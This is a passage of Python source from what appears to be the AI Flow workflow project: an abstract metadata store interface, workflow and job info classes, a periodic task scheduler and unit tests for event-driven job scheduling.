def register_platform(platform: type(AbstractPlatform)):
logging.debug('register platform {}'.format(platform.platform()))
register_job_status_listener(platform.job_status_listener()())
```
#### File: ai_flow/store/abstract_store.py
```python
from abc import abstractmethod, ABCMeta
from ai_flow.rest_endpoint.service.high_availability import Member
from typing import Text, Union, List, Optional
from ai_flow.meta.metric_meta import MetricMeta, MetricSummary
class AbstractStore(object):
__metaclass__ = ABCMeta
def __init__(self):
pass
'''
model api
'''
@abstractmethod
def get_model_relation_by_id(self, model_id):
"""
get an specific model relation in metadata store by model id.
:param model_id: the model id
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` object if the model relation
exists, Otherwise, returns None if the model relation does not exist.
"""
pass
@abstractmethod
def get_model_relation_by_name(self, model_name):
"""
get an specific model relation in metadata store by model name.
:param model_name: the model name
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` object if the model relation
exists, Otherwise, returns None if the model relation does not exist.
"""
pass
@abstractmethod
def list_model_relation(self, page_size, offset):
"""
List registered model relations in metadata store.
:param page_size: the limitation of the listed model relations.
:param offset: the offset of listed model relations.
:return: List of :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` objects,
return None if no model relations to be listed.
"""
pass
@abstractmethod
def register_model_relation(self, name: Text,
project_id: int):
"""
register a model relation in metadata store
:param name: the name of the model
:param project_id: the project id which the model corresponded to.
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` object.
"""
pass
def delete_model_relation_by_id(self, model_id):
"""
Delete the registered model by model id .
:param model_id: the model id
:return: Status.OK if the model is successfully deleted, Status.ERROR if the model does not exist otherwise.
"""
pass
def delete_model_relation_by_name(self, model_name):
"""
Delete the registered model by model name .
:param model_name: the model name
:return: Status.OK if the model is successfully deleted, Status.ERROR if the model does not exist otherwise.
"""
pass
'''
model version api
'''
@abstractmethod
def get_model_version_relation_by_version(self, version_name, model_id):
"""
get an specific model version relation in metadata store by the model version name.
:param version_name: the model version name
:param model_id: the model id corresponded to the model version
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelVersionRelationMeta` object
if the model version exists, Otherwise, returns None if the model version does not exist.
"""
pass
@abstractmethod
def register_model_version_relation(self, version, model_id,
workflow_execution_id):
"""
register a model version relation in metadata store.
:param version: the specific model version
:param model_id: the model id corresponded to the model version
:param workflow_execution_id: the workflow execution id corresponded to the model version
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelVersionRelationMeta` object.
"""
pass
@abstractmethod
def list_model_version_relation(self, model_id, page_size, offset):
"""
List registered model version relations in metadata store.
:param model_id: the model id corresponded to the model version
:param page_size: the limitation of the listed model version relations.
:param offset: the offset of listed model version relations.
:return: List of :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` objects,
return None if no model version relations to be listed.
"""
pass
@abstractmethod
def delete_model_version_relation_by_version(self, version, model_id):
"""
Delete the registered model version by model version name .
:param version: the model version name
:param model_id: the model id corresponded to the model version
:return: Status.OK if the model version is successfully deleted,
Status.ERROR if the model version does not exist otherwise.
"""
pass
'''
example api
'''
@abstractmethod
def get_example_by_id(self, example_id):
"""
get an specific example in metadata store by example id.
:param example_id: the example id
:return: A single :py:class:`ai_flow.meta.example_meta.ExampleMeta` object if the example exists,
Otherwise, returns None if the example does not exist.
"""
pass
@abstractmethod
def get_example_by_name(self, example_name):
"""
get an specific example in metadata store by example name.
:param example_name: the example name
:return: A single :py:class:`ai_flow.meta.example_meta.ExampleMeta` object if the example exists,,
Otherwise, returns None if the example does not exist.
"""
pass
@abstractmethod
def list_example(self, page_size, offset):
"""
List registered examples in metadata store.
:param page_size: the limitation of the listed examples.
:param offset: the offset of listed examples.
:return: List of :py:class:`ai_flow.meta.example_meta.ExampleMeta` objects,
return None if no examples to be listed.
"""
pass
@abstractmethod
def register_example(self, name, support_type, data_format,
description, batch_uri, stream_uri,
create_time, update_time, properties,
name_list, type_list):
"""
register an example in metadata store.
:param name: the name of the example
:param support_type: the example's support_type
:param data_format: the data_format of the example
:param description: the description of the example
:param batch_uri: the batch uri of the example
:param stream_uri: the stream uri of the example
:param create_time: the time when the example is created
:param update_time: the time when the example is updated
:param properties: the properties of the example
:param name_list: the name list of example's schema
:param type_list: the type list corresponded to the name list of example's schema
:param catalog_type: the catalog type of the example if example is stored in the external catalog
:param connection_config: the connection config of the example to the external catalog
if example is stored in the external catalog
:return: A single :py:class:`ai_flow.meta.example_meta.ExampleMeta` object.
"""
pass
def delete_example_by_id(self, example_id):
"""
Delete the registered example by example id .
:param example_id: the example id
:return: Status.OK if the example is successfully deleted, Status.ERROR if the example does not exist otherwise.
"""
pass
def delete_example_by_name(self, example_name):
"""
Delete the registered example by example name .
:param example_name: the example name
:return: Status.OK if the example is successfully deleted, Status.ERROR if the example does not exist otherwise.
"""
pass
'''
project api
'''
@abstractmethod
def get_project_by_id(self, project_id):
"""
get an specific project in metadata store by project id
:param project_id: the project id
:return: A single :py:class:`ai_flow.meta.project.ProjectMeta` object if the project exists,
Otherwise, returns None if the project does not exist.
"""
pass
@abstractmethod
def get_project_by_name(self, project_name):
"""
get an specific project in metadata store by project name
:param project_name: the project name
:return: A single :py:class:`ai_flow.meta.project.ProjectMeta` object if the project exists,
Otherwise, returns None if the project does not exist.
"""
pass
@abstractmethod
def register_project(self, name, uri,
properties, user,
password, project_type):
"""
register a project in metadata store.
:param name: the name of the project
:param uri: the uri of the project
:param properties: the properties of the project
:param user: the user of the project
:param password: <PASSWORD> the <PASSWORD>
:param project_type: the project type of the project
:return: A single :py:class:`ai_flow.meta.project.ProjectMeta` object.
"""
pass
@abstractmethod
def list_project(self, page_size, offset):
"""
List registered projects in metadata store.
:param page_size: the limitation of the listed projects.
:param offset: the offset of listed projects.
:return: List of :py:class:`ai_flow.meta.project_meta.ProjectMeta` objects,
return None if no projects to be listed.
"""
pass
@abstractmethod
def delete_project_by_id(self, project_id):
"""
Delete the registered project by project id .
:param project_id: the project id
:return: Status.OK if the project is successfully deleted, Status.ERROR if the project does not exist otherwise.
"""
pass
def delete_project_by_name(self, project_name):
"""
Delete the registered project by project name .
:param project_name: the project name
:return: Status.OK if the project is successfully deleted, Status.ERROR if the project does not exist otherwise.
"""
pass
'''
job api
'''
@abstractmethod
def get_job_by_id(self, job_id):
"""
get an specific job in metadata store by job id.
:param job_id: the job id
:return: A single :py:class:`ai_flow.meta.job_meta.JobMeta` object
if the job exists, Otherwise, returns None if the job does not exist.
"""
pass
@abstractmethod
def get_job_by_name(self, job_name):
"""
get an specific job in metadata store by job name.
:param job_name: the job name
:return: A single :py:class:`ai_flow.meta.job_meta.JobMeta` object
if the job exists, Otherwise, returns None if the job does not exist.
"""
pass
@abstractmethod
def register_job(self, name: Text, job_state, workflow_execution_id,
properties, job_id, start_time, end_time,
log_uri, signature):
"""
register a job in metadata store.
:param name: the name of the job
:param job_state: the state of the job
:param workflow_execution_id: the workflow execution id corresponded to the job
:param properties: the properties of the job
:param job_id: the job_id of the job
:param start_time: the time when the job started
:param end_time: the time when the job ended
:param log_uri: the log uri of the job
:param signature: the signature of the job
:return: A single :py:class:`ai_flow.meta.job_meta.JobMeta` object.
"""
pass
@abstractmethod
def list_job(self, page_size, offset):
"""
List registered jobs in metadata store.
:param page_size: the limitation of the listed jobs.
:param offset: the offset of listed jobs.
:return: List of :py:class:`ai_flow.meta.job_meta.JobMeta` objects,
return None if no jobs to be listed.
"""
pass
@abstractmethod
def update_job_state(self, state, job_id):
"""
update the job state in metadata store.
:param state: the state of the job.
:param job_id: the job id
:return: the job uuid if the job is successfully updated, raise an exception if fail to update otherwise.
"""
pass
def update_job_end_time(self, end_time, job_name):
"""
update the job end time in metadata store.
:param end_time: the time when the job ended.
:param job_name: the job name
:return: the job uuid if the job is successfully updated, raise an exception if fail to update otherwise.
"""
pass
'''
workflow execution api
'''
@abstractmethod
def get_workflow_execution_by_id(self, execution_id):
"""
get an specific workflow execution in metadata store by workflow execution id.
:param execution_id: the workflow execution id
:return: A single :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object
if the workflow execution exists, Otherwise, returns None if the workflow execution does not exist.
"""
pass
@abstractmethod
def get_workflow_execution_by_name(self, execution_name):
"""
get an specific workflow execution in metadata store by workflow execution name.
:param execution_name: the workflow execution name
:return: A single :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object
if the workflow execution exists, Otherwise, returns None if the workflow execution does not exist.
"""
pass
@abstractmethod
def register_workflow_execution(self, name: Text,
execution_state, project_id,
properties, start_time,
end_time, log_uri,
workflow_json, signature):
"""
register a workflow execution in metadata store.
:param name: the name of the workflow execution
:param execution_state: the execution state of the workflow execution
:param project_id: the project id corresponded to the workflow execution
:param properties: the properties of the workflow execution
:param start_time: the time when the workflow execution started
:param end_time: the time when the workflow execution ended
:param log_uri: the log uri of the workflow execution
:param workflow_json: the workflow json of the workflow execution
:param signature: the signature of the workflow execution
:return: A single :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object.
"""
pass
@abstractmethod
def list_workflow_execution(self, page_size, offset):
"""
List registered workflow executions in metadata store.
:param page_size: the limitation of the listed workflow executions.
:param offset: the offset of listed workflow executions.
:return: List of :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object,
return None if no workflow executions to be listed.
"""
pass
@abstractmethod
def update_workflow_execution_end_time(self, end_time, execution_name):
"""
update the workflow execution end time in metadata store.
:param end_time: the time when the workflow execution ended.
:param execution_name: the execution name
:return: the workflow execution uuid if the workflow execution is successfully updated, raise an exception
if fail to update otherwise.
"""
pass
@abstractmethod
def update_workflow_execution_state(self, state, execution_name):
"""
update the workflow execution end time in metadata store.
:param state: the state of the workflow execution.
:param execution_name: the execution name
:return: the workflow execution uuid if the workflow execution is successfully updated, raise an exception
if fail to update otherwise.
"""
@abstractmethod
def delete_workflow_execution_by_id(self, execution_id):
"""
Delete the registered workflow execution by workflow execution id .
:param execution_id: the workflow execution id
:return: Status.OK if the workflow execution is successfully deleted,
Status.ERROR if the workflow execution does not exist otherwise.
"""
pass
@abstractmethod
def delete_workflow_execution_by_name(self, execution_name):
"""
Delete the registered workflow execution by workflow execution name .
:param execution_name: the workflow execution name
:return: Status.OK if the workflow execution is successfully deleted,
Status.ERROR if the workflow execution does not exist otherwise.
"""
pass
'''
artifact api
'''
def get_artifact_by_id(self, artifact_id):
"""
get an specific artifact in metadata store by artifact id.
:param artifact_id: the artifact id
:return: A single :py:class:`ai_flow.meta.artifact_meta.ArtifactMeta` object
if the artifact exists, Otherwise, returns None if the artifact does not exist.
"""
def get_artifact_by_name(self, artifact_name):
"""
get an specific artifact in metadata store by artifact name.
:param artifact_name: the artifact name
:return: A single :py:class:`ai_flow.meta.artifact_meta.ArtifactMeta` object
if the artifact exists, Otherwise, returns None if the artifact does not exist.
"""
def register_artifact(self, name: Text, data_format, description,
batch_uri, stream_uri, create_time, update_time, properties):
"""
register an artifact in metadata store.
:param name: the name of the artifact
:param data_format: the data_format of the artifact
:param description: the description of the artifact
:param batch_uri: the batch uri of the artifact
:param stream_uri: the stream uri of the artifact
:param create_time: the time when the artifact is created
:param update_time: the time when the artifact is updated
:param properties: the properties of the artifact
:return: A single :py:class:`ai_flow.meta.artifact_meta.py.ArtifactMeta` object.
"""
def list_artifact(self, page_size, offset):
"""
List registered artifacts in metadata store.
:param page_size: the limitation of the listed artifacts.
:param offset: the offset of listed artifacts.
:return: List of :py:class:`ai_flow.meta.artifact_meta.py.ArtifactMeta` objects,
return None if no artifacts to be listed.
"""
def delete_artifact_by_id(self, artifact_id):
"""
Delete the registered artifact by artifact id .
:param artifact_id: the artifact id
:return: Status.OK if the artifact is successfully deleted,
Status.ERROR if the artifact does not exist otherwise.
"""
def delete_artifact_by_name(self, artifact_name):
"""
Delete the registered artifact by artifact name .
:param artifact_name: the artifact name
:return: Status.OK if the artifact is successfully deleted,
Status.ERROR if the artifact does not exist otherwise.
"""
@abstractmethod
def create_registered_model(self, model_name, model_type, model_desc=None):
"""
Create a new registered model in model repository.
:param model_name: Name of registered model. This is expected to be unique in the backend store.
:param model_type: Type of registered model.
:param model_desc: (Optional) Description of registered model.
:return: A single object of :py:class:`ai_flow.model_center.entity.RegisteredModel` created in model
repository.
"""
pass
@abstractmethod
def update_registered_model(self, registered_model, model_name=None, model_type=None, model_desc=None):
"""
Update metadata for RegisteredModel entity. Either ``model_name`` or ``model_type`` or ``model_desc``
should be non-None. Backend raises exception if a registered model with given name does not exist.
:param registered_model: :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
:param model_name: (Optional) New proposed name for the registered model.
:param model_type: (Optional) Type of registered model.
:param model_desc: (Optional) Description of registered model.
:return: A single updated :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
"""
pass
@abstractmethod
def delete_registered_model(self, registered_model):
"""
Delete registered model.
Backend raises exception if a registered model with given name does not exist.
:param registered_model: :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
:return: None
"""
pass
@abstractmethod
def list_registered_models(self):
"""
List of all registered models in model repository.
:return: List of :py:class:`ai_flow.model_center.entity.RegisteredModel` objects.
"""
pass
@abstractmethod
def get_registered_model_detail(self, registered_model):
"""
:param registered_model: :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
:return: A single :py:class:`ai_flow.model_center.entity.RegisteredModelDetail` object.
"""
pass
@abstractmethod
def create_model_version(self, model_name, model_version, model_path, model_metric, model_flavor=None,
version_desc=None):
"""
Create a new model version from given model source and model metric.
:param model_name: Name for containing registered model.
:param model_version: User-defined version of registered model.
:param model_path: Source path where the AIFlow model is stored.
:param model_metric: Metric address from AIFlow metric server of registered model.
:param model_flavor: (Optional) Flavor feature of AIFlow registered model option.
:param version_desc: (Optional) Description of registered model version.
:return: A single object of :py:class:`ai_flow.model_center.entity.ModelVersion`
created in model repository.
"""
pass
@abstractmethod
def update_model_version(self, model_version, model_path=None, model_metric=None, model_flavor=None,
version_desc=None, version_stage=None):
"""
Update metadata associated with a model version in model repository.
:param model_version: :py:class:`ai_flow.model_center.entity.ModelVersion` object.
:param model_path: (Optional) New Source path where AIFlow model is stored.
:param model_metric: (Optional) New Metric address AIFlow metric server of registered model provided.
:param model_flavor: (Optional) Flavor feature of AIFlow registered model option.
:param version_desc: (Optional) New Description of registered model version.
:param version_stage: (Optional) New desired stage for this model version.
:return: A single updated :py:class:`ai_flow.model_center.entity.ModelVersion` object.
"""
pass
@abstractmethod
def delete_model_version(self, model_version):
"""
Delete model version in model repository.
:param model_version: :py:class:`ai_flow.model_center.entity.ModelVersion` object.
:return: None
"""
pass
@abstractmethod
def get_model_version_detail(self, model_version):
"""
:param model_version: :py:class:`ai_flow.model_center.entity.ModelVersion` object.
:return: A single :py:class:`ai_flow.model_center.entity.ModelVersionDetail` object.
"""
pass
def register_metric_meta(self,
name,
dataset_id,
model_name,
model_version,
job_id,
start_time,
end_time,
metric_type,
uri,
tags,
metric_description,
properties) -> MetricMeta:
"""
register metric meta to store
:param name: the metric name
:param dataset_id: the dataset id of the metric or model metric associate with dataset id
:param model_name: if then model metric, associate with model name
:param model_version: if then model metric, associate with model version
:param job_id: the job_id which create the metric
:param start_time:
:param end_time:
:param metric_type: MetricType DATASET or MODEL
:param uri: the metric uri
:param tags: such as flink,tensorflow
:param metric_description:
:param properties:
:return:
"""
pass
def delete_metric_meta(self, uuid: int):
pass
def register_metric_summary(self,
metric_id,
metric_key,
metric_value)->MetricSummary:
"""
register metric summary
:param metric_id: associate with metric meta uuid
:param metric_key:
:param metric_value:
:return:
"""
pass
def delete_metric_summary(self, uuid: int):
pass
def update_metric_meta(self,
uuid,
dataset_id=None,
model_version_id=None,
job_id=None,
start_time=None,
end_time=None,
metric_type=None,
uri=None,
tags=None,
metric_description=None,
properties=None) -> MetricMeta:
"""
register metric meta to store
:param uuid: metric meta unique id
:param dataset_id: the dataset id of the metric or model metric associate with dataset id
:param model_version_id: if then model metric, associate with model version id
:param job_id: the job_id which create the metric
:param start_time:
:param end_time:
:param metric_type: MetricType DATASET or MODEL
:param uri: the metric uri
:param tags: such as flink,tensorflow
:param metric_description:
:param properties:
:return:
"""
pass
def update_metric_summary(self,
uuid,
metric_id=None,
metric_key=None,
metric_value=None) -> MetricSummary:
"""
register metric summary
:param uuid: metric summary unique id
:param metric_id: associate with metric meta uuid
:param metric_key:
:param metric_value:
:return:
"""
pass
def get_dataset_metric_meta(self, dataset_id) -> Union[None, MetricMeta, List[MetricMeta]]:
"""
get dataset metric
:param dataset_id:
:return:
"""
pass
def get_model_metric_meta(self, model_name, model_version) -> Union[None, MetricMeta, List[MetricMeta]]:
"""
get model metric
:param model_name:
:param model_version:
:return:
"""
pass
def get_metric_summary(self, metric_id) -> Optional[List[MetricSummary]]:
"""
get metric summary
:param metric_id:
:return:
"""
pass
"""For high availability:"""
@abstractmethod
def list_living_members(self, ttl_ms) -> List['Member']:
pass
@abstractmethod
def update_member(self, server_uri, server_uuid):
pass
@abstractmethod
def clear_dead_members(self, ttl_ms):
pass
```
#### File: ai_flow/workflow/workflow.py
```python
from typing import List, Dict, Text
from ai_flow.meta.job_meta import State
from ai_flow.graph.node import BaseNode
from ai_flow.graph.edge import JobControlEdge
from ai_flow.workflow.job import BaseJob
from ai_flow.graph.graph import _get_id_generator
from ai_flow.project.project_description import ProjectDesc
class Workflow(BaseNode):
def __init__(self) -> None:
super().__init__()
self.workflow_id: int = None
self.workflow_name: Text = None
self.execution_name: Text = None
self.jobs: Dict[Text, BaseJob] = {}
self.edges: Dict[Text, List[JobControlEdge]] = {}
self.workflow_phase = None
self.start_time = None
self.end_time = None
self.project_desc: ProjectDesc = None
def add_job(self, job: BaseJob):
if job.instance_id is None:
instance_id = _get_id_generator(self).generate_id(job)
job.set_instance_id(instance_id)
self.jobs[job.instance_id] = job
def add_edges(self, job_instance_id: Text, dependencies: List[JobControlEdge]):
self.edges[job_instance_id] = dependencies
def add_edge(self, job_instance_id: Text, edge: JobControlEdge):
if job_instance_id not in self.edges:
self.edges[job_instance_id] = []
self.edges[job_instance_id].append(edge)
class WorkflowInfo(object):
def __init__(self, namespace: Text = None, workflow_name: Text = None, properties: Dict = None):
"""
:param workflow_name: The identify of the ai_flow workflow.
:param properties: The properties of the workflow.
"""
self._namespace = namespace
self._workflow_name = workflow_name
if properties is None:
properties = {}
self._properties = properties
@property
def namespace(self):
return self._namespace
@namespace.setter
def namespace(self, value):
self._namespace = value
@property
def workflow_name(self):
return self._workflow_name
@workflow_name.setter
def workflow_name(self, value):
self._workflow_name = value
@property
def properties(self):
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class WorkflowExecutionInfo(object):
def __init__(self,
execution_id: Text,
workflow_info: WorkflowInfo = None,
state: State = None,
properties: Dict = None):
if properties is None:
properties = {}
self._execution_id = execution_id
self._workflow_info = workflow_info
self._state = state
self._properties = properties
@property
def execution_id(self):
return self._execution_id
@execution_id.setter
def execution_id(self, value):
self._execution_id = value
@property
def workflow_info(self):
return self._workflow_info
@workflow_info.setter
def workflow_info(self, value):
self._workflow_info = value
@property
def state(self):
return self._state
@state.setter
def state(self, value):
self._state = value
@property
def properties(self):
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class JobInfo(object):
def __init__(self,
job_name: Text,
state: State,
workflow_execution: WorkflowExecutionInfo
):
self._job_name = job_name
self._state = state
self._workflow_execution = workflow_execution
@property
def job_name(self):
return self._job_name
@job_name.setter
def job_name(self, value):
self._job_name = value
@property
def state(self):
return self._state
@state.setter
def state(self, value):
self._state = value
@property
def workflow_execution(self):
return self._workflow_execution
@workflow_execution.setter
def workflow_execution(self, value):
self._workflow_execution = value
```
#### File: contrib/jobs/periodic_manager.py
```python
from airflow.utils.mailbox import Mailbox
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.triggers.cron import CronTrigger
from apscheduler.triggers.interval import IntervalTrigger
from airflow.events.scheduler_events import PeriodicEvent
from airflow.utils.log.logging_mixin import LoggingMixin
def trigger_periodic_task(mailbox, run_id, task_id):
mailbox.send_message(PeriodicEvent(run_id, task_id).to_event())
class PeriodicManager(LoggingMixin):
def __init__(self, mailbox: Mailbox):
super().__init__()
self.mailbox = mailbox
self.sc = BackgroundScheduler()
def start(self):
self.sc.start()
def shutdown(self):
self.sc.shutdown()
def _generate_job_id(self, run_id, task_id):
return '{}:{}'.format(run_id, task_id)
def add_task(self, run_id, task_id, periodic_config):
if 'cron' in periodic_config:
self.sc.add_job(id=self._generate_job_id(run_id, task_id),
func=trigger_periodic_task, args=(self.mailbox, run_id, task_id),
trigger=CronTrigger.from_crontab(periodic_config['cron']))
elif 'interval' in periodic_config:
interval_config: dict = periodic_config['interval']
if 'seconds' in interval_config:
seconds = interval_config['seconds']
else:
seconds = 0
if 'minutes' in interval_config:
minutes = interval_config['minutes']
else:
minutes = 0
if 'hours' in interval_config:
hours = interval_config['hours']
else:
hours = 0
if 'days' in interval_config:
days = interval_config['days']
else:
days = 0
if 'weeks' in interval_config:
weeks = interval_config['weeks']
else:
weeks = 0
if seconds < 10 and 0 >= minutes and 0 >= hours and 0 >= days and 0 >= weeks:
self.log.error('Interval mast greater than 20 seconds')
return
self.sc.add_job(id=self._generate_job_id(run_id, task_id),
func=trigger_periodic_task, args=(self.mailbox, run_id, task_id),
trigger=IntervalTrigger(seconds=seconds,
minutes=minutes,
hours=hours,
days=days,
weeks=weeks))
else:
self.log.error('Periodic support type cron or interval. current periodic config {}'.format(periodic_config))
def remove_task(self, run_id, task_id):
self.sc.remove_job(job_id=self._generate_job_id(run_id, task_id))
```
#### File: contrib/jobs/test_event_handlers.py
```python
import unittest
import json
import time
from airflow.executors.scheduling_action import SchedulingAction
from notification_service.base_notification import BaseEvent
from airflow.contrib.jobs.event_handlers import AIFlowHandler, AiFlowTs
class TestAIFlowEventHandlers(unittest.TestCase):
def test_one_config(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
def test_two_config(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
met_config_2 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_2",
"event_type": "UNDEFINED",
"event_value": "value_2",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1, met_config_2]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
event: BaseEvent = BaseEvent(key='key_2',
value='value_2',
namespace='default',
sender='1-job-name',
create_time=round(time.time() * 1000))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
def test_two_config_2(self):
met_config_1 = {"action": "START",
"condition": "SUFFICIENT",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
met_config_2 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_2",
"event_type": "UNDEFINED",
"event_value": "value_2",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1, met_config_2]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
def test_namespace_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "*",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='1-job-name',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='bb',
sender='1-job-name',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='bb',
sender='1-job-name',
create_time=int(time.time() * 1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_event_type_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "*",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
event_type='aa',
namespace='aa',
sender='1-job-name',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
event_type='bb',
sender='1-job-name',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "aa",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
event_type='bb',
namespace='aa',
sender='1-job-name',
create_time=int(time.time() * 1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_sender_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "*",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='bb',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "aa",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='bb',
create_time=int(time.time() * 1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_key_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "*",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "aa",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1_1',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1_2',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time() * 1000+1))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "aa",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "aa",
"sender": "aa",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1_1',
value='value_1',
namespace='aa',
sender='aa',
create_time=int(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
def test_multiple_any_config(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "*",
"event_value": "value_1",
"life": "ONCE",
"namespace": "*",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
